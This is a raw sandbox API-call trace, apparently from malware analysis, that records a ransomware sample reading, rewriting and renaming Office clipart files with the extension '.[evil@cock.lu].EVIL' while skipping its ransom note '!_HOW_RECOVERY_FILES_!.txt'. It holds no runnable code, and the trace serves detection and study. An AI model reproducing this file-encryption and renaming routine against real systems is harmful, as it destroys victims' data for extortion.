(lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02412K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02412k.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.014] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xdd5, lpOverlapped=0x0) returned 1 [0167.018] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.018] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.018] _errno () returned 0x84b1160840 [0167.018] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.018] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xde0, lpOverlapped=0x0) returned 1 [0167.018] CloseHandle (hObject=0x1a8) returned 1 [0167.018] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02412K.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.018] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.018] __uncaught_exception () returned 0x84b1160800 [0167.018] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.019] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02412K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02412k.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02412K.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02412k.jpg.[evil@cock.lu].evil")) returned 1 [0167.020] ??_V@YAXPEAX@Z () returned 0x1 [0167.022] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02412K.JPG", dwFileAttributes=0x200) returned 0 [0167.023] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.023] wcsstr (_Str="PH02417U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.023] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02417U.BMP") returned 69 [0167.023] wcscmp (_String1="PH02417U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.023] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02417U.BMP") returned 0x0 [0167.023] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02417U.BMP") returned 0x45 [0167.023] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02417U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02417u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.025] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7ce0, lpOverlapped=0x0) returned 1 [0167.027] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.027] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.027] _errno () returned 0x84b1160840 [0167.027] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.027] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x7d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7d00, lpOverlapped=0x0) returned 1 [0167.027] CloseHandle (hObject=0x1a8) returned 1 [0167.027] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02417U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.028] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.028] __uncaught_exception () returned 0x84b1160800 [0167.028] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.028] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02417U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02417u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02417U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02417u.bmp.[evil@cock.lu].evil")) returned 1 [0167.029] ??_V@YAXPEAX@Z () returned 0x1 [0167.031] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02417U.BMP", dwFileAttributes=0x200) returned 0 [0167.031] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.031] wcsstr (_Str="PH02466U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.031] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02466U.BMP") returned 69 [0167.031] wcscmp (_String1="PH02466U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.031] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02466U.BMP") returned 0x0 [0167.031] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02466U.BMP") returned 0x45 [0167.032] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02466U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02466u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.034] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7c08, lpOverlapped=0x0) returned 1 [0167.036] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.036] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.036] _errno () returned 0x84b1160840 [0167.037] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.037] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x7c20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7c20, lpOverlapped=0x0) returned 1 [0167.037] CloseHandle (hObject=0x1a8) returned 1 [0167.037] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02466U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.037] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.037] __uncaught_exception () returned 0x84b1160800 [0167.037] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.037] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02466U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02466u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02466U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02466u.bmp.[evil@cock.lu].evil")) returned 1 [0167.038] ??_V@YAXPEAX@Z () returned 0x1 [0167.041] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02466U.BMP", dwFileAttributes=0x200) returned 0 [0167.041] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.041] wcsstr (_Str="PH02470U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.041] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02470U.BMP") returned 69 [0167.041] wcscmp (_String1="PH02470U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.041] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02470U.BMP") returned 0x0 [0167.041] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02470U.BMP") returned 0x45 [0167.041] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02470U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02470u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.043] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x48fc, lpOverlapped=0x0) returned 1 [0167.046] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.046] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.046] _errno () returned 0x84b1160840 [0167.046] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.046] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x4900, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4900, lpOverlapped=0x0) returned 1 [0167.046] CloseHandle (hObject=0x1a8) returned 1 [0167.046] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02470U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.046] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.047] __uncaught_exception () returned 0x84b1160800 [0167.047] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.047] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02470U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02470u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02470U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02470u.bmp.[evil@cock.lu].evil")) returned 1 [0167.048] ??_V@YAXPEAX@Z () returned 0x1 [0167.050] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02470U.BMP", dwFileAttributes=0x200) returned 0 [0167.050] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.050] wcsstr (_Str="PH02503U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.050] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02503U.BMP") returned 69 [0167.051] wcscmp (_String1="PH02503U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.051] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02503U.BMP") returned 0x0 [0167.051] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02503U.BMP") returned 0x45 [0167.051] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02503U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02503u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.053] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7ce0, lpOverlapped=0x0) returned 1 [0167.055] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.055] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.055] _errno () returned 0x84b1160840 [0167.055] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.055] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x7d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7d00, lpOverlapped=0x0) returned 1 [0167.056] CloseHandle (hObject=0x1a8) returned 1 [0167.056] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02503U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.056] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.056] __uncaught_exception () returned 0x84b1160800 [0167.056] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.056] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02503U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02503u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02503U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02503u.bmp.[evil@cock.lu].evil")) returned 1 [0167.057] ??_V@YAXPEAX@Z () returned 0x1 [0167.060] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02503U.BMP", dwFileAttributes=0x200) returned 0 [0167.060] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.060] wcsstr (_Str="PH02567J.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.060] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02567J.JPG") returned 69 [0167.060] wcscmp (_String1="PH02567J.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.060] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02567J.JPG") returned 0x0 [0167.060] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02567J.JPG") returned 0x45 [0167.060] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02567J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02567j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.062] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8499, lpOverlapped=0x0) returned 1 [0167.064] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.064] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.064] _errno () returned 0x84b1160840 [0167.064] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.064] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x84a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x84a0, lpOverlapped=0x0) returned 1 [0167.064] CloseHandle (hObject=0x1a8) returned 1 [0167.064] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02567J.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.064] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.065] __uncaught_exception () returned 0x84b1160800 [0167.065] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.065] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02567J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02567j.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02567J.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02567j.jpg.[evil@cock.lu].evil")) returned 1 [0167.065] ??_V@YAXPEAX@Z () returned 0x1 [0167.068] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02567J.JPG", dwFileAttributes=0x200) returned 0 [0167.068] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.068] wcsstr (_Str="PH02736G.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.068] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736G.GIF") returned 69 [0167.068] wcscmp (_String1="PH02736G.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.068] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02736G.GIF") returned 0x0 [0167.069] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736G.GIF") returned 0x45 [0167.069] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02736g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.071] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x639b, lpOverlapped=0x0) returned 1 [0167.073] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.073] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.073] _errno () returned 0x84b1160840 [0167.073] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.073] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x63a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x63a0, lpOverlapped=0x0) returned 1 [0167.073] CloseHandle (hObject=0x1a8) returned 1 [0167.074] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736G.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.074] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.074] __uncaught_exception () returned 0x84b1160800 [0167.074] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.074] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02736g.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736G.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02736g.gif.[evil@cock.lu].evil")) returned 1 [0167.075] ??_V@YAXPEAX@Z () returned 0x1 [0167.077] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736G.GIF", dwFileAttributes=0x200) returned 0 [0167.078] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.078] wcsstr (_Str="PH02736U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.078] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736U.BMP") returned 69 [0167.078] wcscmp (_String1="PH02736U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.078] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02736U.BMP") returned 0x0 [0167.078] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736U.BMP") returned 0x45 [0167.078] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02736u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.080] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7e90, lpOverlapped=0x0) returned 1 [0167.084] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.084] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.084] _errno () returned 0x84b1160840 [0167.084] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.084] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x7ea0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7ea0, lpOverlapped=0x0) returned 1 [0167.084] CloseHandle (hObject=0x1a8) returned 1 [0167.084] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.084] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.085] __uncaught_exception () returned 0x84b1160800 [0167.085] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.085] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02736u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02736u.bmp.[evil@cock.lu].evil")) returned 1 [0167.086] ??_V@YAXPEAX@Z () returned 0x1 [0167.088] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736U.BMP", dwFileAttributes=0x200) returned 0 [0167.089] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.089] wcsstr (_Str="PH02738U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.089] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02738U.BMP") returned 69 [0167.089] wcscmp (_String1="PH02738U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.089] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02738U.BMP") returned 0x0 [0167.089] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02738U.BMP") returned 0x45 [0167.089] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02738U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02738u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.091] ReadFile (in: hFile=0x1a8, 